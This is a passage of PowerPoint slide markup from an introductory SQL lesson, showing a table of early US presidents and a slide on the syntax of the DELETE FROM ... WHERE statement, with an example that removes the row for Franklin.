                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3244139392"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Thomas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Jefferson</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Shadwell, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-13-1743</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1801</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3743850534"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Madison</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Port Conway, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-16-1751</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1809</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1713610808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe Hall, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-28-1758</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1817</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2522575697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Benjamin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Franklin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Boston, MA</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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2426364152"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213535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Structured Query Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1200329"/>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DELETE FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>criteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DELETE FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>presidents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Franklin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F9EFEC-66FE-4D59-929B-3015F84174C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2274862205"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1313487" y="3423377"/>
          <a:ext cx="9589088" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1136301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3552698260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1481360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168334998"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1556201">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="164526466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2218864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="95918760"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1457510397"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623328670"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>num</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>firstname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>lastname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>hometown</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>birthday</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>hiredate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2394002928"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>George</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Washington</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Popes Creek, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FEB-22-1732</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-30-1789</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1677156271"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>John</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Adams</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Braintree, MA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>OCT-30-1735</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
